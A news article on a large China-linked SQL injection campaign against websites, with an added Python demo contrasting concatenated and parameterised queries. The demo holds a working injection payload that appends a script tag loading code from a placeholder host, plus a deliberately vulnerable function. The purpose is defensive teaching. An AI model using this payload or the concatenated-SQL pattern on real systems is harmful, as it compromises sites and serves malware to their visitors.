
Security advisers have blamed sloppy work by programmers
for the latest round of China-based hacker attacks on hundreds of
thousands of websites.
Up to 500,000 web sites, including some belonging to the UN,
were reported to have been
targeted by hackers from the middle of last week.
The hackers were delivering malicious code to visitors of the
compromised websites by redirecting them to attacker-controlled
servers. The sites were compromised through SQL injection, a
common attack in which untrusted input is spliced into a query
written in the database language SQL.
Initial reports suggested that the websites might have been
compromised through Microsoft vulnerabilities, but this week
security investigators cleared the vendor's software of blame.
Mary Landesman, senior security researcher at
Scansafe, said in a report that the compromises were more likely
the result of poor coding practices.
Stephan Chenette, manager of US-based
Websense Security Labs, said web programmers had failed to
validate user input properly.
"Web developers should heed secure development practices because
a fully patched host may still be susceptible to attack if code was
not properly checked for vulnerabilities," he said.
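The pattern Chenette describes is shown below as an added example; it is not code from any affected site or from the original article. A Python sqlite3 script stands in for the ASP and SQL Server stack named later in the article, the visit-logging page and its content table are constructed sample data, and the host name in the injected script tag is a placeholder, not a real indicator from the attacks. The vulnerable version splices the request parameter into the SQL text, so a crafted `id` value appends a script tag pointing at an external server to every stored page; the hardened version binds the same value as a parameter and the payload is stored as inert data.

```python
import sqlite3


def make_db():
    """Constructed sample content database standing in for a site's backend
    (added illustration only; not data from any affected site)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages  (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE visits (id INTEGER PRIMARY KEY, page_id INTEGER);
        INSERT INTO pages (title, body) VALUES ('Home', '<p>Welcome</p>');
        INSERT INTO pages (title, body) VALUES ('News', '<p>Latest</p>');
    """)
    return conn


# Placeholder host for the injected script tag; not a real indicator.
INJECTED_HOST = "malicious.example"

# Illustrative value for the ?id= request parameter: it closes the intended
# INSERT, appends a script tag to every stored page body, and comments out
# the remainder of the original statement.
PAYLOAD = (
    "1); UPDATE pages SET body = body || "
    "'<script src=\"http://" + INJECTED_HOST + "/r.js\"></script>'; --"
)


def record_visit_vulnerable(conn, page_id):
    """Vulnerable: the request parameter is pasted into the SQL text."""
    sql = "INSERT INTO visits (page_id) VALUES (" + page_id + ")"
    # executescript() runs every statement in the string, matching how
    # batched execution behaves on drivers such as classic ASP talking to
    # SQL Server. sqlite3's execute() happens to refuse a second statement,
    # but that is a driver quirk, not input validation: single-statement
    # injections (UNION, OR 1=1) go through execute() just as well.
    conn.executescript(sql)


def record_visit_safe(conn, page_id):
    """Hardened: the value is bound as a parameter and never becomes part of
    the statement text, so SQL syntax inside it is stored, not executed.
    A real page would additionally reject a non-numeric id up front."""
    conn.execute("INSERT INTO visits (page_id) VALUES (?)", (page_id,))


def page_body(conn, page_id):
    """Parameterised lookup used to inspect what a visitor would be served."""
    row = conn.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchone()
    return row[0] if row else None


def pages_reference_host(conn, host):
    """True if any stored page body now loads content from the given host."""
    return any(host in body for (body,) in conn.execute("SELECT body FROM pages"))


def demo(record_visit):
    """Feed the payload to one version of the visit logger on a fresh database
    and report whether the stored pages were tampered with."""
    conn = make_db()
    record_visit(conn, PAYLOAD)
    return pages_reference_host(conn, INJECTED_HOST)


if __name__ == "__main__":
    print("concatenated SQL tampered with pages:", demo(record_visit_vulnerable))
    print("parameterised SQL tampered with pages:", demo(record_visit_safe))
```

The point Chenette makes about patching is visible here: nothing in the vulnerable function depends on a bug in the database or web server, so no vendor update fixes it; only the application code can.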
End-users have meanwhile been advised to make sure they have the
most recent security updates for all their applications, and
organisations to use web-filtering software to protect their users.
Landesman said the latest SQL injection attacks are connected
with two earlier attacks in October and December last year.
She said all the attacks targeted the UN and used the same code,
indicating that the same person or group was behind them.
Chenette said the precise size of this attack was difficult to
quantify because malicious sites were continually moving, but he
said the number of infected sites has started to decrease because
of widespread awareness of the attack.
Microsoft said on its Security Response Center blog
that the attacks were not related to any known security issues
in Internet Information Services (IIS) 6.0,
Active Server Pages (ASP), ASP.Net or Microsoft SQL
technologies.